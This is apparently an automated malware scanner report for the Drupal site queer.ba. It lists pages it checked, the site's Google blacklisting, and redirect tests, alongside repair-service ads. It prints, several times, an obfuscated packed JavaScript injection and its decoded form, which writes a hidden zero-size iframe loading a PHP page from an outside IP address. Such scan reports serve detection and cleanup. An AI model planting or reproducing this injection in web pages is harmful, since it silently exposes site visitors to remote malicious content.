New scan:

Malware Scanner report for queer.ba

Malicious/Suspicious/Total urls checked
0/5/15
5 pages have suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "queer.ba" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=queer.ba

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://queer.ba/
200 OK
Content-Length: 23365
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

Decoded script:


var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
undefined
/*** called setTimeout with undefined, 1000 */
undefined
/*** called setTimeout with undefined, 1000 */
<iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>

http://queer.ba/misc/jquery.js?v=1.4.4
200 OK
Content-Length: 78602
Content-Type: application/javascript
clean
http://queer.ba/misc/jquery.once.js?v=1.2
200 OK
Content-Length: 2974
Content-Type: application/javascript
clean
http://queer.ba/misc/drupal.js?mjvxbe
200 OK
Content-Length: 14544
Content-Type: application/javascript
clean
http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405616
200 OK
Content-Length: 45178
Content-Type: application/javascript
clean
http://queer.ba/sites/all/modules/panels/js/panels.js?mjvxbe
200 OK
Content-Length: 746
Content-Type: application/javascript
clean
http://queer.ba/sites/all/modules/google_analytics/googleanalytics.js?mjvxbe
200 OK
Content-Length: 3422
Content-Type: application/javascript
clean
http://queer.ba/en/home
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://queer.ba/test404page.js
404 Not Found
Content-Length: 14120
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

Decoded script:


var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
undefined
/*** called setTimeout with undefined, 1000 */
undefined
/*** called setTimeout with undefined, 1000 */
<iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>

http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405624
200 OK
Content-Length: 45178
Content-Type: application/javascript
clean
http://queer.ba/seeq
200 OK
Content-Length: 19154
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

Decoded script:


var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
undefined
/*** called setTimeout with undefined, 1000 */
undefined
/*** called setTimeout with undefined, 1000 */
<iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>

http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405625
200 OK
Content-Length: 45178
Content-Type: application/javascript
clean
http://queer.ba/pocetna
200 OK
Content-Length: 23372
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

Decoded script:


var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
undefined
/*** called setTimeout with undefined, 1000 */
undefined
/*** called setTimeout with undefined, 1000 */
<iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>

http://queer.ba/sites/all/modules/lightbox2/js/lightbox.js?1425405626
200 OK
Content-Length: 45178
Content-Type: application/javascript
clean
http://queer.ba/aktivnosti
200 OK
Content-Length: 24299
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|217||src|height|173|width|board||144|php|44|tag1|ram'.split('|'),0,{}))

Decoded script:


var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://217.173.44.144/tag1.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000);
undefined
/*** called setTimeout with undefined, 1000 */
undefined
/*** called setTimeout with undefined, 1000 */
<iframe width="0" height="0" board="0" src="http://217.173.44.144/tag1.php"></ifee>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: queer.ba

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 18:00:16 GMT
ETag: "1425405616"
Server: Apache
Vary: Accept-Encoding
Content-Language: bs
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 03 Mar 2015 18:00:16 GMT
X-Generator: Drupal 7 (http://drupal.org)
X-UA-Compatible: IE=edge,chrome=1
Second query (visit from search engine):
GET / HTTP/1.1
Host: queer.ba
Referer: http://www.google.com/search?q=queer.ba

Result:
The result is similar to the first query. There are no suspicious redirects found.